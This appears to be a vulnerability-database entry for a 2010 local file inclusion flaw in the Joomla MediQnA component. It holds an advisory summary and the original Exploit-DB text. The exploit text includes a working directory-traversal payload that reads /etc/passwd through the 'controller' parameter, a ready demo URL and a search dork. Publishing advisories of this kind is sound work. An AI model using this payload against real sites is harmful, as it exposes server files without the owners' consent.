Joomla Component MediQnA LFI vulnerability

vendor:

Medi-QnA

by:

kaMtiEz

7,5

CVSS

HIGH

LFI

CWE

Product Name: Medi-QnA

Affected Version From: v1.1

Affected Version To: v1.1

Patch Exists: YES

Related CWE: N/A

CPE: a:famouswebsites.biz:medi-qna:1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component MediQnA LFI vulnerability

A Local File Inclusion (LFI) vulnerability exists in the Joomla Component MediQnA. An attacker can exploit this vulnerability to include arbitrary files from the web server, such as the /etc/passwd file. This vulnerability is due to insufficient sanitization of user-supplied input in the 'controller' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable script. Successful exploitation of this vulnerability will allow an attacker to include arbitrary files from the web server, resulting in the disclosure of sensitive information.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

[!]===========================================================================[!]

[~] Joomla Component MediQnA LFI vulnerability 
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage	: http://www.indonesiancoder.com 
[~] Date	: 27 May, 2010
[~] location    : Indonesia

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://www.FamousWebsites.biz/
[+] More Info : http://www.famouswebsites.biz/JED/Medi-QnA/Medi-QnA.php
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.famouswebsites.biz/JED/Medi-QnA/com_mediqna.zip
[+] version : v1.1

[!]===========================================================================[!]

[+] [ Live From Jogja ] [+]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_mediqna&controller=[INDONESIANCODER]

[ XpL ]

../../../../../../../../../../../../../../../etc/passwd%00


[ d3m0 ]

http://[site]/index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../etc/passwd%00

etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW ARUMBIA TEAM
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,heart_attack
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,yur4kh4,MISTERFRIBO,pL4nkt0n


[ NOTE ] 

[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM 
[+] Jika kami bersama Nyalakan Tanda Bahaya ;)
[+] ajep ajep ajep ajep
[+] r3m1ck : makasi di bolehin bubu di kost nya .. kwkwkwkwk

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..
[+] ./e0f